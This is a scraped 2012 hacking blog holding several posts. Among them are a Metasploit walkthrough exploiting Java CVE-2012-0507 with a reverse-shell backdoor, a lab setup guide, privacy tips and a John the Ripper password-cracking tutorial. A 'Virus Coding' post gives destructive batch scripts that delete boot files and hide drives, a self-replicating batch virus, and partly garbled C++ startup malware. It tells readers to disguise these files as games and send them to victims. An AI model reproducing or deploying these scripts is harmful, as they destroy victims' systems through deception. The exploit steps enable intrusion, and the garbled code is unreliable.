Monday, August 27, 2012

Lock/Unlock Computer With Pendrive


First, what is “syskey”?

SYSKEY is a utility that encrypts the hashed password information in a SAM database in a Windows system using a 128-bit encryption key.
SYSKEY was an optional feature added in Windows NT 4.0 SP3. It was meant to protect against offline password cracking attacks so that the SAM database would still be secure even if someone had a copy of it. However, in December 1999, a security team from Bind  View found a security hole in SYSKEY which indicates that a certain form of cryptanalytic attack is possible offline. A brute force attack then appeared to be possible.
Microsoft later collaborated with Bind View to issue a fix for the problem (dubbed the ‘Syskey Bug’) which appears to have been settled and SYSKEY has been pronounced secure enough to resist brute force attack.
According to Todd Sabin of the Bind View team RAZOR, the pre-RC3 versions of Windows 2000 were also affected.
So this is pretty cool, right?  Well, I really like the idea of keeping this on Floppy so that it requires a floppy disk (a sort of 2 factor (hardware/software) authentication?).
Naturally I wanted to go a bit further and use this on a USB drive instead of storing to a Floppy.  I can’t see myself carrying a floppy and a USB floppy drive around with me.  After all, this provides another layer of security.
NOTE:  I haven’t tested copying data from 1 USB to another USB to see if it works as a backup.  This way you could lock up a USB drive as a spare if needed.
Here’s how to get this to work using a USB drive.
1.  Insert your USB drive into your system and wait for it to be recognized and install any necessary drivers.
2.  Fire up disk management and re-assign the drive letter it was given to “A”.


Start up disk management by clicking Start and typing diskmgmt.msc



Right-click the USB drive and choose to assign driver letter or path.

Assign it to letter “A”

Accept the warning message

Now your USB drive is “A”

3.  Run Syskey and save encryption to USB Drive “A”

Click Start and type syskey followed by hitting Enter

Syskey launched; Click “Update”

Choose “Store Startup key on floppy disk” and click “OK”

You’ll be prompted to enter your diskette. Make sure your USB drive is inserted and writable.
4.  Reboot and have fun.  Don’t lose your USB disk!  Also, to revert this, you can run syskey again and choose to store it locally instead of “on a floppy disk”.
Posted by at No comments:

How to hack remote computer using Metasploit? Exploiting Java vulnerability CVE-2012-0507



Whenever someone say PenTesting tool, the first thing come in our mind is MetaSploit . Today, i am going to demonstrate how to use the Metasploit tool to exploit the popular java AtomicReferenceArray Type Violation vulnerability(CVE-2012-0507).
About MetaSploit:
Metsploit is a very Powerful PenTesting Tool . Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Very useful tool for Information Gathering, Vulnerability Scanning, Exploit Development, Client side exploits,...
Mastering the Framework: A free course from Offensive-Security
The Offensive Security Team along with several active community members, made a free course on the Metasploit Framework "Mastering the Framework". The course covers Information gathering, Social engineering attacks, exploit development, Advance AV avoidance and etc...

The course is available here:
www.offensive-security.com/metasploit-unleashed/Introduction

Donate to HFC, Feed a Child!
The "Mastering the Framework" is free course. If you enjoyed the course, please donate to Hackers for Charity(HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is directly sent Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

You can find further details about the donation here:
http://www.offensive-security.com/metasploit-unleashed/Donate

Hey, where are you going?! Wait a Sec, take that course Once i demonstrate how to use the metasploit. Because, It will be hard to understand or boring, if you read those things directly.

Requirements:
  • VirtualBox 
  • Target OS(windows,...)
  • PenTesting Distro(Backtrack )
  • JRE 6(unpatched version)

CVE-2012-0507 is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.
Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, Flashback malware infect more than 600,000 Mac computers by exploiting this vulnerability. Recently, The INSS , The Amnesty International UK websites injected with malicious code that exploit the CVE-2012-0507.
I am going to demonstrate this vulnerability with VirtualBox.  I have setup two Virtual Machines namely "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in the 'BT5'.

(need help in configuring the VM?, read this: setup PenTesting Lab).

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and Type "msfupdate".  This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

slow Internet Connection?! If you have slow internet connection, then you can download the java_atomicreferencearray module alone instead of updating all modules.
Download the java_atomicreferencearray.rb and paste in this folder "/opt/metasploit/msf3/modules/exploits/multi/browser/"

Then, Download CVE-2012-0507.jar and paste in this folder "/opt/metasploit/msf3/data/exploits/"

Part III :

Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:



Step 1:
Open the Terminal and type "msfconsole".  This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.


Now type "show options" to display the which settings are available and/or required for this specific module.



Now type "set SRVPORT 80".
and  "set URIPATH /".



Step 3: Set Payload
Type "show payloads", this will displays the list of payloads.  We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.


set LHOST [IP_address] :  In order to get reverse connection, we have to set our IP in the LHOST. 

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine.  The IP will be "192.168.56.x".   For instance, let me say the ip is 192.168.56.10.

Now  Type in the msfconsole as "set LHOST 192.168.56.10".



Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.10). Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2:

Open the Firefox/IE in the Target machine. 
Enter "http://192.168.56.10".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine, it will display the following output:


Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.


Step 4:Upload files

Yeeeh..! we got backdoor to the Target machine, now we can run any commands in the Target.

For Example, Typing 'sysinfo' will display the system information.

You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.


Security Tips:
Update your JRE to the latest version.

conclusion:
I hope this article has given you a good insight into how to use MetaSploit Framework to exploit the Java vulnerability.  I hope this will help you to get into the PenTesting world..!

So, you enjoyed the Tutorial , right?! If you have any suggestion or have doubt, please drop your comment/mail me. 
Posted by at No comments:

Virus Coding


 

Viruses tha crushes your own PC!

@echo
offattrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c “A VIRUS IS TAKING OVER c:Drive
Save as bat file in notepad!!
This will pop up a message saying OWNED!!
And shut down the computer never to reboot again!
Type this in notepad
start virus.bat
virus.bat
and save as with this name – virus.bat
ur antivirus will not detect this virus.
Basically this program will delete all that files which are needed for bootingIf your os is installed in d drive instead of c then replace c with d.
Save it as 'sth.bat'(Virus Coding)!!
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0×38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0×38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]=”C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”;
ifstream input(inputFile);
if (!input)
{
{
ofstream fp(“C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”, ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
Sleep(60);
}
}
for ( int j = 0; j
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout <
}
goto START;
}
Matrix Virus!
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0×38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0×38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]=”C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”;
ifstream input(inputFile);
if (!input)
{
{
ofstream fp(“C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”, ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
cout <
Sleep(60);
}
}
for ( int j = 0; j
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout <
}
goto START;
}
Open notepad and paste this:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Save it as eicar.com. The Anti-Virus should stop you (if it does that means its working).
Batch Virus Code Creation:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \”Sorry Your System is hacked by us!\” -f
I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim
Ebomb a virus for fun
This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type
@echo off
start iexplore
start notepad
start firefox
and save it as anyname.bat (note: paste the code with “start ” in many times to annoy them)
you can also do some additional stuff like enter the message for victim eg. msg * “(Now your pc is getting Hacked)”
and also you can open some websites to irritate victim eg.
start iexplore “www.ethicalhack4u.blogspot.com”
start firefox “www.maverick-deepanker.blogspot.com”
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it ………….. :D
(Sample eg.
@echo off
msg * “(sorry buddy but you just f*$%d your self)”
start iexplore “Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
start iexplore ” Any Website name “
start firefox ” Any Website name “
start notepad
and then simply save it as “anyname.bat”
Note : The only way to get out of any ebomb attack is simply by System restart
How to create an advanced and dangerous virus:
@echo off>nul.ViRuS
if “%1==”/ViRuS_MULTIPLY goto ViRuS_multiply
if “%1==”/ViRuS_OUTER_LOOP goto ViRuS_outer_loop
if “%1==”/ViRuS_FINDSELF goto ViRuS_findself
if “%VOFF%==”T goto ViRuS_OLDBAT
set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if “%ViRuSname%==” goto ViRuS_OLDBAT
rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it’s a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append /x:on path (chance=minimal)
attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=
goto ViRuS_OLDBAT
:ViRuS_findself
if “%2==” goto XXX_END>nul.ViRuS
if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
shift>nul.ViRuS
goto ViRuS_findself
:ViRuS_outer_loop
for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS
:ViRuS_multiply
find “ViRuS” xViRuSx.bat
find /v “ViRuS” >xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS
:ViRuS_OLDBAT
echo on>nul.ViRuS
echo This Virus Is Made By U-Hacker.
:XXX_END
Save it as virus7.exe and release the monster.
Posted by at No comments:

Sunday, August 26, 2012

Protect your Computer from Viruses and Hackers


How do you protect your computer? 

Check this out [Works for Windows XP, Vista]

This trick will help against Hackers & Viruses(Mostly for Viruses it is Helpful)

Caution: You must be Admin or must have Admin privileges

Step 1:

Go To “Folder Option” in “Control Panel” –>”View Tab”
Uncheck “Use Simple File Sharing” –> Apply & OK.

Step 2:

Right Click on C: Drive(If Operating System is installed in C: drive) –> Properties.
You will see a new tab as “Security”, click on it .
Select User’s at “Group or user names” (you will see all permissions of users on C:Drive) –>Edit It As per your requirement(Suggestion: Uncheck Write Permission For All Users except Admin) & Apply it.
Restart It!!

Mission Over 

[Suggestion: Use this trick during fresh installation & Just Use Any Other user who has no Admin privileges]
Posted by at No comments:

How to Set up your Pen Testing / Ethical Hacking Lab with a single Computer ?

We have provide you plenty of Ethical hacking and Pentesting tutorial, still more article is going to come.  Meanwhile, i like to teach you how to set up your own Pen Testing/ hacking network Lab.

Use of your own Pen Testing Lab:

  • Free, free ,free..! It's free lab, because it is yours..
  • Only one system is enough
  • can Practice your pentesting/hacking skills 
  • can install any kind of malwares(spyware,trojan) or RATs and test how it works
  • and more ...
is it possible to create a lab with single system?
Yes, you can. we are going to set up lot of vulnerable system virtually .  Confused? VirtualBox is open source software provided by Oracle corp that allows to run multiple guest OS(virtual system) in a single system . 

Requirements:
  • Virtual box latest version and its extension (get it from here: www.virtualbox.org/) 
  • Windows XP image file(xp.iso) ; it is going to be our target system
  • Backtrack Linux image file(backtrack5.iso); we are going to launch the attack from this OS.
First of all, Learn how to configure the Guest OS in VirtualBox from here:
https://www.virtualbox.org/manual/UserManual.html
This page will you explain everything about Virtualbox and how to setup Guest OS.

I hope you now familiar with installing Guest OS.

Set Up your Target system:
Now we have to set up the target system.  Install the Windows XP in VirtualBox using the xp.iso file.  After installation completed, disable the Firewall in xp so that it can become more vulnerable system.

Set up your PenTesting System:
Install the Backtrack5 in Virtualbox. Backtrack is penetration testing Linux that has lot of hacking tools .  We will hack the target system using this backtrack.

Network Settings for Guest Os:
Step 1:
click the File menu in Virtualbox and select Preference
Now select the Network Tab
Click the + symbol in the side that will add a new Host only network

Step2:

Right click on the Guest OX(eg:xp,backtrack) and select the Settings.
Select Network tab.
Now you can see the "Attached to" option menu.
change it from NAT to "Host only Adapter"
Do the same thing for both Guest OS.

Step 3:


Now run the both guest os .
Finding the IP address of Target System:
open the Windows XP Guest OS window.
open the cmd in Windows XP and type ipconfig
This will show the ip address of XP. It will be 192.168.56.101
Hacking with Pen Testing System:
open the Terminal  and type "nmap 192.168.56.101".
Now it will show the list of open port.

You can hack the target system with open ports.
Posted by at 1 comment:

Thursday, August 23, 2012

Hacking


Hacking

Posted by at No comments:

HACKING


HACKING

Posted by at No comments:

IP & Subnetting Workbook For CCNA Students - prt 2


ip and subnetting workbook for CCNA students - prt 2

Posted by at No comments:

IP & Subnetting Workbook For CCNA Students - prt 1


ip and subnetting workbook for CCNA students - prt 1

Posted by at No comments:

Wednesday, August 22, 2012

Free Download Ebook Ethical Hacking (EC-Council Exam 312-50)


EC-Council E-Business Certification Series
Copyright © by EC-Council
Developer - Thomas Mathew
Publisher - OSB Publisher
ISBN No - 0972936211
By explaining computer security and outlining methods to test computer systems for possible weaknesses, this guide provides the tools necessary for approaching computers with the skill and understanding of an outside hacker.
Introduction
This module attempts to bridge various aspects of ethical hacking by suggesting an approach for undertaking penetration testing. There are different ways of approaching a penetration test.
  • External Approach
    • With some prior knowledge
    • Without prior knowledge
  • Internal Approach
    • With some prior knowledge
    • With deep knowledge
Whatever the approach adopted, it is a fact that penetration testing is constrained by time and availability of resources, which varies from client to client. To effectively utilize both these telling factors, penetration testers adopt some form of structure or methodology. These can be checklists developed by consulting practices, widely available resources such as Open Source Security Testing Methodology or a customized attack strategy.
There are is no single set of methodology that can be adopted across client organizations. The skeletal frame of testing however is more or less similar. The terms of reference used for various phases may differ, but the essence is the same. As discussed in preceding modules, the test begins with:
  • Footprinting / Information Gathering phase
  • Discovery and Planning / Information Analysis phase
  • Detecting a vulnerability / security loophole
  • Attack / Penetration / Compromise
  • Analysis of security posture / Cover up / Report
  • Clean up
The general objective of a penetration test is to reveal where security fails. The result of a penetration test can be:
  • successful attack - when the objective is met within the scope of the attack
  • a partial success - when there has been a compromise, but not enough to achieve the objective
  • a failure - when the systems have been found to be robust to the attack methodology adopted
Foot printing / Information Gathering phase:
  • Client site intelligence
  • Infrastructure fingerprinting
  • Network discovery and Access point discovery
Discovery and Planning / Information Analysis phase
  • Target Identification
  • Resource and Effort Estimation
  • Modeling the Attack strategy (s)
  • Relationship Analysis
Detecting a vulnerability / security loophole
  • Vulnerability Analysis
  • Scanning
  • Enumeration
  • Zeroing the target
Attack / Penetration / Compromise
  • Exploring viable exploits (new / created / present)
  • Executing the attack / Alternate attack strategy
  • Target penetration
  • Escalating the attack
Analysis of security posture / Cover up / Report
  • Consolidation of attack information
  • Analysis and recommendations
  • Presentation and deliverables
Clean up
  • Clean up tasks and procedures
  • Restoring security posture

Download Here:
Posted by at No comments:

Tuesday, August 21, 2012

History of Hacking (1-5)


Posted by at 1 comment:

How to stop Facebook from browser tracking you



Many websites and this includes Facebook (Like) and Google Plus (+1) use buttons for recommending web pages on social networks. These social networks also monitor your browsing behaviour, even if you don’t have an account and this is also happens even if you have third-party cookies disabled.
ShareMeNot is a an extension in Chrome and an add-on in Firefox that allows you to stop Google and Facebook as well as other social networks from tracking you online. By default ShareMeNot blocks, AddThis; Digg; Facebook; Google+; LinkedIn; Pinterest; StumbleUpon; and Twitter. Check out my post from January last year where I suggest you use ShareMeNot.
ShareMeNot will now completely replace the buttons with local stand-in buttons (text). This design allows ShareMeNot to avoid making any requests at all to the trackers until you click on one of the buttons. The old version made requests to trackers to load the buttons, while ShareMeNot removed cookies from those requests, they could still reveal information like your IP address. Here is how you use ShareMeNot in Chrome and Firefox:
Google Chrome (extension)
  • Download and install ShareMeNot extension
  • You will find the ShareMeNot icon in the address bar
  • Click the icon – you can choose to > ‘Allow all trackers this time’ or deselect particular trackers by unticking them – then click > Done
  • *You can also click > ‘Manage tracker blocking’ – this lets you allow certain types of buttons on specific pages on that website. Click the > ‘Exceptions’ button next to the service you want to allow
  • Enter the domain name in the > ‘Add a new hostname pattern’ box and press ENTER. The exceptions are listed in the above box. You can cancel these exceptions by using > ‘Remove All Exceptions’ button or click > ‘Close’ when you done
  • To use any button i.e.+1 (Google+) on a one-off basis click the ShareMeNot button for that service. This will reinstate the i.e the +1 button for that page. You will need to reload the page to allow trackers that were blocked when the page was loaded.
  • Note: You can also run this tool in incognito mode
Mozilla Firefox (add-on)
  • Download and install ShareMeNot add-on
  • You will find the ShareMeNot icon is in the bottom right corner
  • Click the icon – you can choose > ‘Allow all trackers this time’ or deselect particular trackers by unticking them – then click > Done
  • To use any button i.e.+1 (Google+) on a one-off basis click the ShareMeNot button for that service. This will reinstate the i.e the +1 button for that page. You will need to reload the page to allow trackers that were blocked when the page was loaded.
  • Note: You can switch off ‘automatic updates’ from > Tools > add-ons
*This feature is not available in the Mozilla Firefox add-on
Why protect your online identity? Your personal information belongs to you, however your personal information is of considerable interested to third parties. Third parties will sell or rent your data to other parties so they can collect information about you. I believe that you should have total awareness and control of your personal online data. If you are reading this post, then you are probably interested in using this useful privacy extension / add-on for protecting your online identity.
Posted by at No comments:

How to remove evercookies from your PC


When you visit a website, every website will store a text-based cookie on your PC – worth remembering it’s not an executable file. Websites will track your browser behavior using a cookie which is stored in your cache and history. The cookie is used for authentication (including encryption), storing site preferences and so forth. In fact a cookie can store anything that is “data”. Most browsers (IE, Firefox, Chrome, Safari) will allow users to delete cookies after a browser session (normally when you close the browser).

However there is one cookie which is very difficult to remove from your PC. The ‘evercookie’ is a persistent JavaScript API, which if you value your privacy, should have an option to be removed from a browser session – strangely it isn’t. For most surfers you will probably be unaware of this cookie and if you do know what it is, the chances are you will not know how to remove it. It’s little understood outside of technical and marketing circles – online advertisers and app developers are using evercookies more and more – so let’s have a closer look at how you can control and manage these persistent cookies.

The evercookie is stored in multiple data storage locations on your PC, so it’s very difficult to completely remove. Privacy wise, the evercookie can be deleted but it has an uncanny habit of regenerating itself. It behaves more like spyware or malware and I’ve heard it refered as ‘obfuscated code’ – it is delivered as part of JavaScript, HTTP, Flash, Silverlight, HTML5 DOM etc – so this means the evercookie and it’s purpose is completely concealed from you. Is this malicious code? Probably, but it’s not illegal for the distributors to use. Still value your privacy? If you do, then I suggest you use either BleachBit or Maxa-tools which will stop most of these persistent cookies:
*BleachBit and Maxa-tools works with Firefox, Opera, Safari, Internet Explorer (IE), Google Chrome and many more Windows, Mac and Linux applications.
For those who use the popular CCleaner, this doesn’t currently remove these persistent cookies, so I’d suggest you use BleachBit or Maxa-tools to control/remove the evercookies. The most secure way to protect your browser from evercookies in my opinion, is to use a sandbox. This isn’t for beginners though.
Posted by at No comments:

Penetration Testers Open Source Toolkit 3rd Edition 2011 RETAiL EBook - DiGiBook

Posted by at 1 comment:

Friday, August 17, 2012

Learn How To Enable Your Task Manager If It Is Disabled In Windows Xp

Default Learn How To Enable Your Task Manager If It Is Disabled In Windows Xp.
 
Here nothing is needed to be downloaded , the main feature lies in your own computer . Just follow these easy steps.

Type gpedit.msc in the run.

Goto User Configuration>Administrative Templates>System. Now you may see a window like the given one:-
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

Click Ctrl+Alt+Del option.

Now you may see four options which are:
  1. Remove change password .
  2. Remove Lock Computer .
  3. Remove Task Manager .
  4. Remove Logoff .
  • Double click option number 3.
  • Now you may see a window like this:
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

Check Not Configured or Disabled . You are done. You may now see your Task Manager.
Add to hackz's Reputation Report Post
Reply With Quote Multi-Quote This Message Quick reply to this message Thanks
Posted by at No comments:

Top Hacking Forums

Posted by at 7 comments:

EC - COUNCIL CHIFI-Brochure V 8


Chfi Brochure
Posted by at No comments:

Welcome to CHIFI Training


Chfi Slide All
Posted by at No comments:

How to Hack a Forum


How to Hack a Forum - Tutorial
Posted by at No comments:

John the Ripper Tutorial

                                        John the Ripper Tutorial

---Introduction---

Well I've decided to make a John the Ripper tutorial. John the Ripper is a pretty good password cracking tool. Here is a description from the site(displayed later) where you get it:

Quote
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

I'm going to go through the Windows way to use John the Ripper and I will cover some of the basic types of attacks and things you can do with John the Ripper. This article will be fairly long so I can try and explain things in a way that I hope most people can understand.

---Some Bits of Information---

DES Hashes

John the Ripper is known very well for it's ability to deal with DES hashes (and is the main one I'll be concentrating on in this article). I'm going to briefly explain a bit about what a DES hash is. DES stands for Data Encryption Standard and is a method for encrypting information like passwords. The Key length for DES is 56 bits. Well the key actually consists of 64 bits but only 56 of these are actually used by the algorithm and the other 8 bits are used solely for checking parity(error detection) and are therefore discarded. The DES hash will have 13 characters and will have a username or something on the front of it. Therefore, a DES hash will look like this: shape:CRjRYEn9g3PUc
As you can see the username "shape" is in front of the 13 character encryption and they are separated by a colon(:). If you would like to learn more about DES you can go here: 
http://en.wikipedia.org/wiki/Data_Encryption_Standard

If you want to make your own DES hash just follow these steps:
- Go to this site: 
http://www.yellowpipe.com/yis/tools/encrypter/index.php

- Type the text/password or whatever that you want to be encrypted in the text box
- Click on the drop-down menu and choose the option "DES Crypt (one way)"
*Note that it says one way because while this site decrypts many things, it will not decrypt a DES hash, only encrypt something into one.
- Click ok
- Copy the encrypted text and past it in notepad with username: in front of it so it looks like my above example
- Save it in the run folder of John the Ripper as a .txt file

You now have your own DES hash

As you will see further in the article, dictionary attacks use wordlists. If you want to get a wordlist you can search online through google or something and find them easily. There are many many many places that have wordlists. All a wordlist is, is a text document full of words that you place in the run folder of John the Ripper. An example of such a site is this: 
http://www.theargon.com/achilles/wordlists/

Now lets start the tutorial.

---Installing on Windows---

First things first, if you don't already have John the Ripper, go here to download it: 
http://www.openwall.com/john/

The download you want as a windows user is John the Ripper 1.7.0.1 (Windows - binaries, ZIP, 1360 KB) if you were confused.

Some tips when you install John the Ripper that will make things easier on you but you do not have to do them if you don't want to:
- Save it in the plain old C:/ location, none of that program files location or anything
- When it installs it will probably look something like C:/John/john1701/ etc. Move everything out of the john1701 folder and into the first folder. Then delete john1701.
- Now when you go into your C drive and open up the john folder, you should see both the doc and run folders instead of john1701
- In the run folder you will see the application "john-386" or "john-something". Just rename that to "john"

These few tips will make less work(not a whole lot less, but a little) when writing out the commands that are following.

When you install John the Ripper, you will not open anything in the installed folders nor would you go to Start and Programs to find it newly installed there for easy access. No, With John the Ripper you have to open it via the MS-DOS command line. I assume you already know how to open the command line but in case you don't and don't want to have to admit that to someone for fear of getting made fun of, Go Start, run, and type in cmd or command.

Once you have that open you have to go to the John the Ripper directory. If you did what I said above in the tips, the it should be in the folder "C:/john/run/". If you didn't, yet you still installed it with at least the first tip, it should look something like this "C:/john/john1701/run/". To go to the location in the command line you have to type this command: cd C:/john/run

With this command typed in the next line should look like this: C:\john\run>

Now type in "john" or "john-386" (without the quotation marks of course) depending on the name of it. You should have the program information menu come up and it should give you the list of things it can do. Now is when we will get into the types of attacks I will show you in this article.

-Bruteforce Attack-

First I will show you John the Ripper's bruteforcing mode. All this mode does is try every possibly combination of letters(both upper and lowercase), numbers, symbols or any combination of the three until it finds the password. Before I tell you how to do it, we have to take our hash (I'm going to use shape:CRjRYEn9g3PUc from above), copy and past it in notepad, and save it in the "run" directory in John the Ripper as a .txt file. I'm going to call it hash.txt. One way to do this type of attack is to type in "john hash.txt" (all commands will be without the quotation marks) and press enter. This will start trying to bruteforce the password. Another way would be to drag the hash.txt file and drop it on the john application (this will be done in the run folder). There is a big problem with this type of attack though and that is that it can take extremely long and no one wants to wait long periods of time if they don't have to. You can stop the process at any time by pressing "ctrl+C". Also John the Ripper doesn't show the progress but you can check the progress by pressing any key(assume the key wont do something to interrupt the program; just use enter or an arrow key or something)

-Bruteforce Attack with conditions-

One way you can shorten things up is by choosing if you only want to use letters or numbers to crack the password. So if you think the password only contains letters you can use the command "john -i:alpha hash.txt", if you think the password only contains numbers you can use the command "john -i:digits hash.txt", you can also use the command "john -i:all hash.txt" to guess the password which uses both the letters and numbers.

-Dictionary Attack-

